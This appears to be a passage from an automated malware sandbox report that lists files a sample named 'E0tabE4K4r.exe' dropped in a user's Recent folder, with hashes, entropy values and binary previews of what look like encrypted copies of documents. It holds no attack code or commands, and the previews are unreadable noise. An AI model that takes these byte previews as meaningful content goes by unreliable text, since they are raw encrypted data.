                                                                                                                                                  SHA-512:9F0B6686926ACD787E02BB6635C966DB1D372B2A908D5192D3F2B829DADA9AE447477F2CD1BA880F40755E1106A596596639EF039B54C9455D386F6638F06D94
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX8v..(...,......"...._UB.i\..........>..x..P;..2.7...dC.....}|....$4.....:...6~.C......?\..|.f..+....y...f..Z..T.Q(.-i..g....:..:.%..`.V....K....$.@...X....1..D16s......Q.b..7.>......{P.a....F*tK...I...J.{n.}n).@..O=...U....,.......C..H.>.\.B...........z.bHW?..G.E/.R.B.M..........I...+.K.?.R..{.mt......Is}Nf..2.;.].H=...Oz..kj.dn./..4.....D$..-c.t..;.T9:5.*....L wq....!).r......=|X.a{N.....D.*;>..k{8p.{...&U...oU...0Br.q.;.p.sf?#..pIV...[...k.jw......f.Y.2....8.9.k.......Sny....sVk..NYt....g....,..d .;.4...l\..?.......A..}T.+.......S.Ci$....8.v....^.........d.n%X$.ra.N..B...`...#.?bA.@['..b.<..&......u.L..P..2 .7r.Z...O..p.-(...zW|..Y..ox.^<U.;6...'..yc..+..$..:...+.Ff.b.z.LG.ou. ......b.j7.X..u.,3G&f=.E.1.Md.d...g.'y..F#..%..U..rJ.X.:...{...W.SeS..<.......r..9nD..[...{....qlF..!.]....h;...$....7..W}'7..S.O2..._.....].Z...q...[n;.../.K......M50#"N.p.P.f>...9...kTG................z!<..4.9.^.e?p.:W.*.V.."zg.....Q..FiE![..o^.az.q

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\MQAWXUYAIK.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.87025139304484
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pf6KpbD0JJOLg7H4ft5aaKtTbBpYPSSG+9qN6cxYnt7t2bD:pf/pXlgDsiDySSjUN6cQiD
                                                                                                                                                  MD5:D4B5CBDA3F54F9315536A82381CFEDCC
                                                                                                                                                  SHA1:7B43251C4CDB116B828113EC6ED3C735C8FBD8AC
                                                                                                                                                  SHA-256:98ACE78B4489135091685FAC48F9EF6CCA5ABC5F83D28652EC568C55819316FE
                                                                                                                                                  SHA-512:6BD689949B9A6AD61650137BF09229539B7230C99E17705380E44020697795C132DC61516C8E0E2E9FFED59A15CCD9544746276CE0CBF1D5EA0A0D56D440D19D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWXT..z.#.f..-B\..~[...-......S......qt. .......:kb....S....f....wbPh..(.....g...3.......J..........?..wv[..OgY-.p9S.x1Xx..../.@..M.nZ....C{.n....n.(.....Y.7....%t.[.....k.c..'0d.R.@..o..9t...:.N.5...1.]......-...Gv.xx....n..HG|.oi....d0....8.f..a.JK.*...@/....h!...F!...q.1........ ..xV.QV.g..j.....n.i..ygz.....F-^u.g.....,..Jkxd.Z.`.f........0.k...=`....@.r/...A.... {!.dS..?|./5.M.f4(9.._>Q.F.|..#&a[bv........1....vN.';..d......T..G.5.6..l.'...X&..z.B.XU..Fv.......vW.....3....*.!.@....v...&W...d.....8....Z,..d.ND.C....B}js..../.{..Q4.>L..G2..cb.=.$.E[U*......<4.sw]..\i=......`.KG=i.`.o..r....7.6.(.sY.....FI...>..3..G?&%.......>.$m...r.S(...h.-^N.wK-.d.J..\~P..*O......?..l.o.{...Hk...q...q...l.P{..?K<.c.J..Ew..d.g.b.._e...s...B.1.Z..zP..'..+M.T..&...}....-=$..) yH..7f.Z.......O.....Q....3.]S..u..f...m........2.:.}.F..4.JFG.(U..b..$t...._..UA.L6sg........k.;...Q..#...}.r=..pL...k*@ku...A.4e.p..$...!.U..Gg..$?.C........)z5.?..{.WPZ

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.80657569399168
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mgUAdlp4HYM98Yai3fZ8Wa8JihjYDURol9q9IIpT25QEbsgYCr2sMfmkfMs8aZ2X:mFov4Hz8Yai3fZ8WaJxYD1nW4GEtYg2E
                                                                                                                                                  MD5:56DA7FBBF1DEDD13720FE34BA9CD62CF
                                                                                                                                                  SHA1:58D6651A7CBB35B4DF4D305F60AFC666D6A880AD
                                                                                                                                                  SHA-256:194D4326E42924F9FD6D86C682E52F2F994E3F2F4A2D317B59C810E2CC35B066
                                                                                                                                                  SHA-512:91813391365FBB4E90EEC610F5BA7A0190D54EC438F63B8C6BE4230D06C71E4970E58FF1BB18F11CA4BC2AE5D93B2EA0A46A233805FB3687A223A794F2295929
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC.<...`.'.;.a(".5m...l.PCS...\b.V..B...t,*..$...L,.{.c.JQ.=.C.9.zQ.=3.@...P.$..u.:d..<B.5I../$.0.._....z.(.,\..-V.!G`....S.....M..[R_B.t.......6.{..3..E..........~......b@x.."..`.lN.z.S..."xZGc...c..}.}.......t)5.^.6....$#......{?kB..J...|..qDJ.4Z.%.1.....uca...z|.!.-...?IM.._c&..').e.h.....C.v.k...GuR..K9.."#.."..?g..=.@.k...gB....U.dl"R(vN..5.....T.-m....'<Agd..%...N..VkV...N.JY.~]"u..-h9.....p...Nr>..U.$S.Y..(S.>.#ly..7..-4.Q&{..#.}........Y$!.o@2.......[@C..@....l...Y...2kdZ..m..J..L.\*.S......w.h*....f^g.Y....2....D.j.l...-..%...E.....<.)..R."....D1J.........f...P..|... ......e.t..B...U.....r=.J+.W.u. ..@Q.xO.GE.B....6.G...X.N.......*ST.9'.<*.CZ.....C.I8.~#..g.^.+.\..trb.pL...&...?..i...(..*..)Z........Z..~.B.......g.$KY.....CW....G.=.B.`..m..$.h!Ud]..y.+..y..2'~....."........B.j...7..a.<...cd..=@0$.......8.......@....t...w..E.........l).C..h.3.\~+.SY........t.q;#4.H.e..X..Y4}j+.`..P-.J.B.*G.-..k.6YR.r.1..........Y..}...djG9C.....

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.862896559032469
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qMdbvr636OvOjm+rk8a/mu5Y+/DyslhG9s03Y/jHKYG9rdgg0F1d2bD:l9vR4R+E/mu5nW/9s0WLG1ZD
                                                                                                                                                  MD5:1B0880D441984745DB6A99610D024000
                                                                                                                                                  SHA1:C13D742B49ACA19C711680DEFAA135EDB1F96D75
                                                                                                                                                  SHA-256:D7B0A4C0874D77244EFB380AED9A3E94DE3949B3B971C018329C0B742250C16B
                                                                                                                                                  SHA-512:A4F3B7E88501D6B4868496799BA76C719A05F2F21153EF5052BD6327FEE1C9AEC3A44F863E4FB007722D8DD0CC812F927C28E820EDF90F3F3C18BA8AE1099E61
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC.4..=.o...L+4f..}V..WDL...B..V.O.......+......P..}t8......dfC=F.y..G{.{}...w....7.>......lt....0I|..%.O..W.q\.....hWB.nR.|I...0.>.J(.=.$X.....Sx..+...}.YFpRq..g~s...}.U.x..d3F..A..*8.Ja.#......Y....Z3......YQ.?.E...2.:.J.u.e.;..Kk.x......H.).|q&h.t.&...=Gy)...SnYa........7v.E..3.|.......<v6;..|.[.-....h.d~j.........7.N..w.Z..J......k._.M.t.h.e2..3.R....q...A<.Q..=gA.._..9..J....C..z.Mn....z...E.m.|....3.'.6..$..i.x..i....o...........).......%xf.#[....X......W.....{.u1.". . ...RE.iU..x..)....eFL.KC..u,H.2..+.>.<.A".y.v..~9p.tUY>.6....R....&.....wn..L.u.x...$.jH .....8..hU..~Z.X.2....+...&..BVY....H....5.q.......`.....B(=.H.M.my....@n...;..sj..J...zj.........)..T....s[.Y.u..2..e.B..T.....:.]va.......D......._1.....[Kz...Z.1?@..C#t..m.?.S7_.Z[sA...&..H.f^..Rz.{..]m..N..3.A......RX....[.=..+....`..b.lj...MOU.3ni.+.q.......y#....4.+C...r>..g.u..S..jq.c.J3.m|q....U......=..$.......B.f.C..g.`..;.........Hkw.Kx....9{...X....Q<q ...@......

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.856709065274824
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:39i2EQw0OxOcdJmIA9rlHXKIpfjdQ0fKnonslP5Vc6y53psnyGQANNClubNHlhxw:Pxw0sL/YBHXKI9m0f5nsNzc6y5ZMso5A
                                                                                                                                                  MD5:486CD6ED635EAC7762DCBC0B1CAC815F
                                                                                                                                                  SHA1:A4740E2E553E6A33E8D031E35B9E991C5A153ABF
                                                                                                                                                  SHA-256:A9D53EADF89822BBE663BDDE3C43DED1055B1FA1B36B0B7E168B582090173340
                                                                                                                                                  SHA-512:5787294A8483D641A685C41866608AE19055D392426477D7A3FF8052E1F2740323004470268E473CB26B65561B95DDDABDF0ED5921EA0D5FA42EE2C2D0FCEFEE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC%.....m.C.b.a-..x..o.L.n.&.(...L.>...\(n..,.Th.w....Z.Xk....c.C..T...^...4B....:.J|..9_m'fdZg\M7^:.?.*.........t....1s!.~_Ic:...,.L..y.M.MHD..M8?F.U.....q.o.*.....~..|.7.l{.z. .....MK...G.pA..,n......u....q. .....q<.."..o.....Q..e....J..c.T.....>.a.(..YL.....m.....(f.:o.T.........M.&...N)m...CdTgl/PS..i.$.M.;.{.S-..^J=. ...t_...~.p.r.,..................JL'%..c.T......ER..../.V..s0...$-.va$n.].?]...>.._.d5...0.....0.......q.4.N.......*.4.._{+>!...T......o.......N...y.e...~.=<.m.y.....rC.|r.W:2.....yjZ..x.`f|.U..K.....:....8}tRN)y<JP^9...|i..5xrx.<X....Cv....W3.M..O.....q..Q.....b@.TN^u.^....._..N:W".J..3....U....l}!n....D.h.f{x...V.....P.z.OC.r.g"~.R...n......A8").?...xi.....RS.....4...(.....[....*.5 @Zk.{.w.u...u.......x..(.^.zMf.wB..H..:.;..POc....AIg..9....X.............c.6..).+...V.....C...G..d5....... .. .{Y...x.#(.....!. ,..y..J.oq..Bv[.E..>.Q.Z*P .....s...n=.!d.....#....3...qCF....O.h.:>..f.n....s....>.x.....-.,L.`...9.z...

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\PSAMNLJHZW.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PSA archive data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.866371904345975
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:vg3plgJHiQ4/NHpOGXVp3PdykjhkKZF5FXwbomn+aQk2bD:vOgJCQmjjvta+j3D
                                                                                                                                                  MD5:34DD90952F06CAB05F447F68E2A314DE
                                                                                                                                                  SHA1:734A38AE94352E88FCC0391F16BFC1BA4130219C
                                                                                                                                                  SHA-256:CE17673CFE37A8F4EAF639E301D5B1781E49135BBFA998D5FC098CE6BB23A5AF
                                                                                                                                                  SHA-512:34AAAAC9647DBF60BCEAF4DE4B82ABB18E22029B156A600B106BC7D3300AA84507FE85E779CE08110AE7E5D3C98F7898905DD08B6D52C3ED2F2BC1E65D713DB5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSAMN...o.:iZ...).F..m..['NN..2.^c.Jo.."...e.yQ.4.^.^K..\...2..'..7Haa.)(.C.`.p.%.F6H.MCH.....L....'...T.Q."....`.X.b.e. [..R9.9R..l......9...H..OR...7.p.}53.N.&.... ...f..4.?.3f.;N....R.:..g..t........`V.L.Y.....C...A...Q.esYx........X.}.u..iY).>2=.........6...5+.h...v.....d.j...<...$d...p..z.]ie\......#.+.A.:Mp..[.$.7.>..........1.*...O.....5..).2H.4....1N...b.*...Ae.r&#..P...K.N@..........W..I4l.tS..l:.....:.....4.].0.5Z.;....l..q.....w]M.r.k.....N.v^.p74$/.<..Y>.>.5./...0'..L.=..k#..Q..W)..%..&.X..M..V.I.W..H`<.#h.%......c.|fHs....._+........{.Z..&..]".D.....}D.>E.W...p.t>.^..!.t.fj.&.=Z.u...'..Z.`g...Z..W.`%........&:NQ{..OE....;o(..:x../=...Eh.c..*.....n..7..o......Q...Zc....O.|...T...nd....._~.P.....*>....?.....z1x.G.e.|..N..,..c..\3.}....X.OX..Z....b6.....#.}z$.pT....;.JYP...B......P.F,m+....8.Ya#.Y..f.b./'..V..O.I.O.[.t.s....\u..t/\....Z.3t....=.7P.r.m\1..T(}.'..R.M..hq(V....[....6...s..,....`&..1....Pi.$../......|G...T.Ew..3

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\PSAMNLJHZW.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PSA archive data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854175157050005
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QIIqROxSpVa9Jioppm+pPp0js3f2D4wwF6bJsaRtbWp//OX/wxUrZ2bD:QjqKSpVa/i+pPPuD4wwITb81xhD
                                                                                                                                                  MD5:C9AFAE8F3EE3B9757626CA8C2BA4D7B8
                                                                                                                                                  SHA1:89860B4C0328258E2227F9561345FB4E8CE13EA5
                                                                                                                                                  SHA-256:AD1F044F39310CD3B948C5BD2DABCF8CC48C6C43F54556E83EFCBE0324F48020
                                                                                                                                                  SHA-512:389D87ABE2BB26D5E82E5D92C884EF283E3DD689CC754952B165BCD2515C3B664477530121359ABFBE6B18D57BCA97AC965709B8A52027D0D4F8C968A2F993BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSAMNU...;S.c../.......!......g7..S&O...?v.j.....].....u)...Q.".uZ.jA0x..,Z]+......r.. .......m..>..J..7..-s.i.&/.0.y."D{p.. .......|........b.....,..y.A....:fI....]}_...g6......[j3#.Nc..9...."'{...m...b;...5..[..Z..fxu.`FM.S.d)8.I*..f...gOe`z._....!.d.... .X...-..n...P..@..1.r.4.Lw..{B....D....s..s.gG%.,g..v.P....z...).G4(X.....hy.s...Q..F...../..........,..g...V.N+...2...0J.#.mO.e\{.V.&...W8u..KC...Nr.>P(..r.NX.....t..].....t.....G.H.0..[,...s..uHj\`../2n..^,..~..Ji....\.........o...D..N.?Mr3k.j3...o...k..WU..0..J.[.3:VSf.=..v..)[.....Q:$f.'.Ke.Ba'....m....f.B..OM..8..sg.v9..v..P..?H.I..f.<5..-)R@...l.L.\+..^.&F@..eEx...R!R0\../P..V.,...K.o...?..\..=a.....Zy....3......{E.w.!..rk..>/.;n.f.........v....E........R.....)=..1.[...&.......Esf.....y\....%.L#.Ox.r..s?F...~g.y....#.....6.N.t......+.QoQ...o.\.:*ZW..<.....c..&+...z.i]v....).*.M..JfjXrL...).H.s;0R.%..Z.F.v...?..sw.|.!:L.Cr..:)..jQ...K..GCP.P.`.W....'..B.c.S...f..x..29#..t"Mf.9...

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\PWZOQIFCAN.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.846113063904367
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:5iOU3UPUmWR7hUwXIzgEJiygicxS/cIO7L6smiTfspqXsqJDTIIna2bD:9U3UPiVjUgEJ7cxucr+wCqXFJYIRD
                                                                                                                                                  MD5:3E750901740864B2FF9488A0EDE2ABB0
                                                                                                                                                  SHA1:E9CD6892002BE65FBC1B3BB98AEE95D03FB66AC9
                                                                                                                                                  SHA-256:3D90AD4D7C336B2DCA87761F37BDD055B17B56CF3FF32CB693BB09C959080779
                                                                                                                                                  SHA-512:0D3063EB22A70847C981AF4501AC187190165A8FE022BE87C120CEA144E35BFCF5FC135655121295DFB72306DE1F852578E4D544A239DCDE73FC74731C4FBABE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PWZOQ.(....f.2C.m...X.+...os.q~....c.!..O..b.h.fe...@.......a..<<.}..@u..e...P67}...F....../..2...'.)+(\..'...........0........8......P.L"!...M..~.RW_$.E.D..IS........o9..*......}w.....*.ck.laW...?....}..o.\.W.7S...........V...=.W..k...3V..\y.raE......v....D...JA3m..`.q e'}...........gp.3~..M....{.Wd..L..#.....s.Ap.6~O.5.}9.p..$..-F..\.....h..;.......EK.w..\..6s.U......./.$h.@.x....@'.Z@..?...$._9.$[..X0k_.W0..T......=.........w......<Ng.s....V....}......Q.O...,u~*i....C:.....G........1.k...*.....7.H......<..n..i....7.U..D ....J..U.gg[..n...7:..l.0=n...W..!..]..nu0.;.\L....u.o..5..v...4...l...2.@6.Kj.&Z.L!...J1.h._...k9..^A.z(....%.[.....C~X..."...V..U~E|Is.+)..g..;.....=1.F.M...g....<..b......@.Y.>^..C... "....6.z.ZU...xP&.]\..H.2.W......0.U...I..71. ..y..~y..EN.B?.[....!....=.E..f..@'..U..W`.......:.".Y.)jcS.v.;.\......\.\.6........yu.k!..k.S.{..;.v..~.&`.f.k..oO.[;.$|..Y......d`..\...u.-.....g.....E..)x.F!.:%.m.a(.G_..."2.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\QVTVNIBKSD.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.846347844251049
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:xM8JSi6UMYP0Ha8jvPyKQW0QHM5gcRF2n2ScyOgOYsBx4RwGUcnBCSE2bD:xMSEYP0HjjXyKQXgcyn28+YeCxUcnBCI
                                                                                                                                                  MD5:921B85260B3911AF01616DBC4C5F434F
                                                                                                                                                  SHA1:4019A6D61C0BC78AC4EE38B66EC1C57626A9CAEC
                                                                                                                                                  SHA-256:4F23F841C49465B9B230790EA7E35765E84D3DFF6FC60818E2C882E3E9EF280B
                                                                                                                                                  SHA-512:DEEFDA5A9AC3982AC160B9B8B7C148E540ACD499AA05610D9A39953723C2A31359A2F1C7E60B0684A675EAFE10A823478C5A57B17322206CEDE41CB44EA898E3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN.......d......oJ8..o.X...i..c(..X...@.f...>..1..M..D..'.8S.Rupz....[...-......y.Si.x...lo>.n....D..=i...z...'cwL.Pj.%.nc...z.t...6).|..5P... Y2K.y..."......GD.5Q......2.f3e.|Y\..Z....@........iB..&....B4.%...F%5.G...<|b....)..A-:h.q5..~SZq....?x......-R...T....i...~.%.8..g........d..Gb..N..UX.FQ.....!H..0.......E.....x..aAP.......h7..R...s..4 ..z[vM.q3..^(..i....}....."9.T...H....9.N.k......d.+/s'.[..b7...s...e.%.Z.X.......f..J.xS........0.m.z.*<..Q....&lYC.EV.E......_f...`..4..6.,...v3..!......|.7h.il.......g...P...N|:v>P.3......S..r..<`._.......nk6x...`p5/.....6..._z.NSV.21.T.a..^.*.....?....x...hT...8....3LF.....H...*.@%....k......6y...g\.P{.O...PN.*.[.G..g..c...)..-&....L..e..QH.=.>..`..'.~?n0..J3.b.......:F7.i...h...P..|y..6...?....Jm..c.J...j..N..)...`9.n&..+..#.9U[.....E..u=.....}..T....G<.k....."T.c.m..b./..[N?..nG...j}...;....Y.X(}.n...b.7.2i...2...1.O..t..f.t..F.......>.u,.a..;pr........k.(0G.a.....BF0!P.2..W.YM..S..R:HI

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\QVTVNIBKSD.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.866848145829771
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OKxKP0i5WX+zwD9n8A4MpSQbLGhX+50VrNeb/4opjlT+juc3/cwZ2ForlYlL6o2X:TAWOzw5nNLWB80FNe74oxlT8lvcwZ2pu
                                                                                                                                                  MD5:E01D5FF115E1917C432C0031AB13CC17
                                                                                                                                                  SHA1:0FE047661F3298B67C0BCC10740654F9542D7D30
                                                                                                                                                  SHA-256:8A8E5E87D16EB0B5A8A55F50BDCBD403D6815333A066847BE6BAA347C0D97D3F
                                                                                                                                                  SHA-512:8E111C1317C326CEC4C7AF5FB6FEAA3391A4F272BDF08131598C1E563E123C1744D1B60CECD61A8428C1A0C2DA55C6DB8B55127A5A843544FB450A931AADAD99
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN..>.. ..lHN}.o\....yBi-x....Z7?.r.G.,u.R.......9..d.......w..NH..X.VcI0....W..>..-..Je.[..T.c .l....Wq.\L..'K3.v..P.....\Zu?...........W..C......O......./P".......n9...S.t.....S".r..=.1w..L,U.N_.H[tu.a*.+p3.9.t.|..PX.C..........s..k..6..^;.t;M..<.....]0Mh.,9.y...W.+...z.K.T...B..VM.y.V....8..5.'.J.....Q#..2....L..........e..U.kjG@.@.u.L.....t!.2...F..l....l\-...S..eI4..e..:...V....O:.s.4.n\...........n.k^.9.L....{.T....j..Y.e.(...(.\..1V.*....W...N......i.0.......<.R8&6~....Pb^.....E-t...3..a...J..'.|....l..vE.Bp&...y...hst..<.u..~8./.9"C...u...u..q..m'T.>....i..I7b.X..|...t....V...G.j%.u.p..+..6(.).n.K*....._.....|AML......i..:...%.Z~u.e..n..?xY.8....h.(B..2..C.......1p3..z.*L.+h..Z...@..&,..f..5.lp......^.S.\}q...)..o...C..t.^.?.....c.],p......MP....07E..n....30....Q....XdV.p&@.,......_...t.x.....G....J=$..a&..N.....>.O[|RC.e.#..--...s........xb1....]4...........;.I.,<..d...:%......CC"C.7...H....TA....^[~g......v6;../Gu8 ?.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\SQSJKEBWDT.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.86137494693689
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:UO0zEPe4cjFzHRuh/QVWUR4EVkje2LzADaFuJFTZq9sh+L2bD:UANa5GckjFLzADIunEezD
                                                                                                                                                  MD5:81C9B54F64B659CB5AC70253BD10526A
                                                                                                                                                  SHA1:12F3963D77A0A35F62FB07C09A6876A279789A9E
                                                                                                                                                  SHA-256:0B0E5EEE69225F1E192DA63EE84539B0CA8E5EB506794D4356C2BB2EEB02938D
                                                                                                                                                  SHA-512:73D033A4B0950094AA0BBDEFA91D94CDAAF39E4EFF91215B53966C77406554173759C34D590903DFB12D443E49DBB6825275AAEACD39603B846C45ECA8187088
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQSJK.6...W....R|.Om-NC4..B....tR...O.q.C+.Q..].M=!~.*......@.....5.J.I....M .....a...^B.....`.L.G,.m.P.........(4..L.ON....... v....ujR.f.....r....w.2.l?@Z.')..f...+....Y.1.n.6.{......`^.,....Q......3......k.L......(...-.F...J).F(Mc......s..d....>bi.. ... .Gh..ja^.T.5?.........%.^s..w.&...r...@......K....u!.....7qn...Y<5......U.<.(.7...%D.......58.s[.....<.......n!..y.x.Z.f..b..W..=]1P3@.c.....H~/...7....C.."7..0%zi.....q...rJ..]...../..Q.Y..u.b....D8..Z.S..........E..B.I_V3.?q.s~.T.4.\...+..-..=.....2...J4I,..T..oq...jyY.VRq.n..........p......p{......J..a..O.@.#.../.A?(o..L.P..Z.Vy. @b........C...\...../...l.p..V/@......S..Y..}..ePu3...x..HL#...o....N.<........U..j...'.s....M.:u....[.(.i\.E.?.V0{g]fHX3....#.....i.6>.."....*.#.W..^(.,4W.............l......K-.H.;.R.*i..1.b^..R.)..=...LC...W....s....m.{O...e...d=.......d%..../..~7."...2#.x.K:.cd...L....ce...g.......6Js=....n........#..N...F.b..iS..a...J_G.^....k...\../&..

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\SQSJKEBWDT.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.856037933602533
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:6VPuTEgh4qh06M0eIOWlzqRuLTh+DFmuIVYQrq53zK44tFHqo4waS2bD:sPuTEgh4qhd9eIsgXrutIq53zKtxn7aB
                                                                                                                                                  MD5:B994039C64315119B112E9AB98B66BA4
                                                                                                                                                  SHA1:B6325A41EE2DD5AE1E0DAD998F1EC64F0B018413
                                                                                                                                                  SHA-256:AE3073F469B41DC9DDB26BECA9068AF9D83FEE79D5EC7403A5A98FE83223F54F
                                                                                                                                                  SHA-512:62B6F849A8614F456B333EC8F7CC8C8A6C917E0D4474772768C1FA3D0F729C7A08A08D13F1D5174577466D078847193921F98CCB94D3FF3261FF3573C1737E2C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQSJK .%)J......kyG...'...........(.HBj...N...a..R.N-....R.8.s1.J........=.....B..u-;@....}..E/R.j.....o..#.,t.F.Iw.../h....+..-'lQyI. ...?(...1u..c]9>[...U........9/y.9U...^.......;c..L.X.^@..&.x..f....kMx...a<.^"...WJw....._9V...'I...h..X..%..&...y.N.t.GR.NR...9...;.G....G...{...j....!..X..%.=....'.w...F..D2uTb....-...g-/e5..N.5.....|f.... `...Z1:....{.......x.=...'.&..8....N....e......p..Cl.....4K.c.5.>. ........R.&.|.....6..r.......y..w..X.M.3.d..rSI...AD$...Q.-...&x$}..D.^.~....UV&..f.......\V..l........`b'..N..S..j.j...|.*U....u...B...c.A._Z..m...M..7.g....q..Oi.~4.....J.+?./#....j.4..2.Y...F.U...R~...>+._x.3..?...=.PP.....3.g.....1.1.H... yp.h.."..,{.....D..1....:....@3$..=.......[.L>..@`.8.X.Z.c...l.5...Z..{....*..P..=....`.Oi.j..2..k..K.N......./."Tr...cQ.i....s..3...w.....8.s......r".,F..B.......M.F..1...v../..>HC....B.$..D.7...5]...3....V..D,lo.;p.{k...|.....t<"......./.|.+......x...;7..t..t....q..}.l.."..... ..'n.L....B5*.K.....&9.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\SQSJKEBWDT.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.851195501556457
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:nzLs0BGI+gVwVdGWiCVyeeurMvJnfWdMMWZV59nHA7BvoXGSTEpWPD3Igw3Y2bD:zJBZqVdliCVyeeuAvJcMMq59gVwXGSI3
                                                                                                                                                  MD5:2B2E5DEDF0CDDF7EEBEF5202CA25F3D2
                                                                                                                                                  SHA1:6DFF8A7939E4D67C29C2FCE6E46265B41EAA399A
                                                                                                                                                  SHA-256:0B7EBE30FA3CC1104921B3C2FDFDBC1B1D1686A7A66BF5333AF5DF409033E204
                                                                                                                                                  SHA-512:11AEA5302137D1DEE7EE93CA81889BC85EC6F2FB6F6BBD42EE498629F474B87EE5D1A2B78BC672B1978A47752859DAB0873682087ED20630498354E3F8114695
                                                                                                                                                  Malicious:false
